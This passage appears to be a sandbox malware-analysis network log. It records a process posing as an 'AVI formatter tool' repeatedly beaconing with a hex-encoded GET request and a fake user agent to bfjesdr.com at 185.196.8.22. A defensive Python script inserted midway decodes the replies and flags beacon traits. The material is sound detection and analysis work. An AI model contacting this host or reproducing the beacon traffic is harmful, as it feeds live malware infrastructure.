                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
30         | 192.168.2.4 | 49768       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:18.792203903 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:19.013776064 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:18 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
31         | 192.168.2.4 | 49769       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:19.323282003 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:19.545475960 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:19 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
32         | 192.168.2.4 | 49770       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:19.860307932 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:20.077200890 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:19 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
33         | 192.168.2.4 | 49771       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:20.385287046 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:20.605820894 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:20 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
34         | 192.168.2.4 | 49772       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:20.917853117 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:21.145807981 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:21 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:21.260404110 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:21.477252007 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:21 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:21.589920998 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:21.806840897 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:21 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:21.921629906 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:22.143377066 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:22 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID: 35 | Source: 192.168.2.4:49773 | Destination: 185.196.8.22:80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:22.447246075 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:22.664195061 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:22.776323080 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:22.993115902 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:23.104121923 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:23.326683044 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
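Every request in these sessions carries the same 208-character hex q= value, the same User-Agent and nothing else, and every reply is a 24-byte chunked body with a 14-character hex token inside. The following is an added example, not code from this report, from Joe Sandbox or from the sample: it decodes the body shown in the Data Raw column, scores the request against a few browser-versus-beacon heuristics and measures the check-in spacing. The sample strings are transcribed from the rows above; the heuristics, thresholds and function names are assumptions of the example.

```python
"""Added example for this report section (not code from the report, Joe
Sandbox, or the sample): decode the chunked response body printed as
"Data Raw" and flag the request pattern visible in sessions 35-40.
Sample data is transcribed from the report rows; function names, the
heuristics and thresholds are this example's own assumptions."""
import re
from datetime import datetime
from typing import Dict, List

# Transcribed from the report: the 208-hex-char q= value every request carries.
Q_HEX = ("67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e9"
         "92874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95"
         "129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7"
         "ef909b39ce669111")
SAMPLE_REQUEST = (f"GET /search/?q={Q_HEX} HTTP/1.1\r\n"
                  "Host: bfjesdr.com\r\n"
                  "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
                  "\r\n")
# "Data Raw" column of the matching 200 OK, exactly as the report prints it.
SAMPLE_DATA_RAW = "65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a"
# Request timestamps of sessions 35, 36 and 37 as printed in the report.
SAMPLE_TIMESTAMPS = ["Jan 13, 2024 06:33:22.447246075 CET", "Jan 13, 2024 06:33:22.776323080 CET",
                     "Jan 13, 2024 06:33:23.104121923 CET", "Jan 13, 2024 06:33:23.635052919 CET",
                     "Jan 13, 2024 06:33:24.160497904 CET", "Jan 13, 2024 06:33:24.495011091 CET"]
# Windows NT versions Microsoft actually shipped; any other value in a UA is fabricated.
SHIPPED_NT = {"3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
HEX_QUERY = re.compile(r"^/search/\?q=([0-9a-f]{32,})$")


def decode_chunked(data_raw: str) -> bytes:
    """Turn the report's space-separated hex dump into bytes and strip HTTP
    chunked transfer-encoding, returning only the application-level body."""
    raw = bytes.fromhex(data_raw.replace(" ", ""))
    body, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)   # drop any chunk extension
        pos = end + 2
        if size == 0:                                   # last-chunk marker
            break
        body += raw[pos:pos + size]
        pos += size + 2                                 # skip the chunk's trailing CRLF
    return bytes(body)


def parse_request(text: str) -> Dict[str, str]:
    """Split a raw HTTP/1.1 request into request-line fields and lower-cased headers."""
    head = text.partition("\r\n\r\n")[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ")
    headers = {k.lower(): v for k, v in (h.split(": ", 1) for h in header_lines)}
    return {"method": method, "target": target, "version": version, **headers}


def beacon_indicators(req: Dict[str, str]) -> List[str]:
    """Reasons this request looks like a C2 check-in rather than a browser search."""
    findings = []
    m = HEX_QUERY.match(req["target"])
    if m:
        findings.append(f"q= is a {len(m.group(1))}-char lowercase hex blob "
                        f"({len(m.group(1)) // 2} bytes), not a search term")
    ua = req.get("user-agent", "")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in SHIPPED_NT:
        findings.append(f"User-Agent names Windows NT {nt.group(1)}, a version never shipped")
    if "MSIE" in ua and "compatible;" not in ua:
        findings.append("MSIE token without the 'compatible;' token real IE sends")
    if "accept" not in req:
        findings.append("no Accept header; browsers send one")
    return findings


def body_is_opaque_token(body: bytes) -> bool:
    """True when a text/html response carries no markup at all, only a hex token."""
    return re.fullmatch(rb"[0-9a-f]+", body) is not None


def parse_ts(ts: str) -> datetime:
    """Parse 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ' as printed by the report,
    truncating nanoseconds to the microseconds datetime supports."""
    m = re.match(r"(\w{3} \d{2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d* \w+$", ts)
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def beacon_intervals(timestamps: List[str]) -> List[float]:
    """Seconds between consecutive check-ins; a tight, regular spread is the beacon signal."""
    times = [parse_ts(t) for t in timestamps]
    return [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    print("decoded body:", decode_chunked(SAMPLE_DATA_RAW))
    for f in beacon_indicators(parse_request(SAMPLE_REQUEST)):
        print("indicator:", f)
    print("intervals (s):", beacon_intervals(SAMPLE_TIMESTAMPS))
```

Run stand-alone it prints the 14-character token hidden behind the chunk framing, four reasons the request is not a browser search, and check-in gaps of roughly a third to half a second. The same three checks (fixed-length hex query to one host, a Windows NT version that does not exist, sub-second cadence from one PID) are what to pivot on in proxy or EDR logs; the q= value and the returned token are opaque and should be treated as indicators, not decoded further on the strength of this report.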


Session ID: 36 | Source: 192.168.2.4:49774 | Destination: 185.196.8.22:80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:23.635052919 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:23.851478100 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 37 | Source: 192.168.2.4:49775 | Destination: 185.196.8.22:80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:24.160497904 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:24.382257938 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:24.495011091 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:24.711961985 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:24.822813988 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:25.039720058 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:25.150953054 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:25.372836113 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 38 | Source: 192.168.2.4:49776 | Destination: 185.196.8.22:80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:25.681452990 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:25.897917986 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:26.015897989 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:26.237591982 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 39 | Source: 192.168.2.4:49777 | Destination: 185.196.8.22:80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:26.546508074 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:26.762892962 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49778 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:27.072328091 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:27.294039011 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49779 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:27.603542089 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:27.820477962 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:27.931664944 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:28.153575897 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
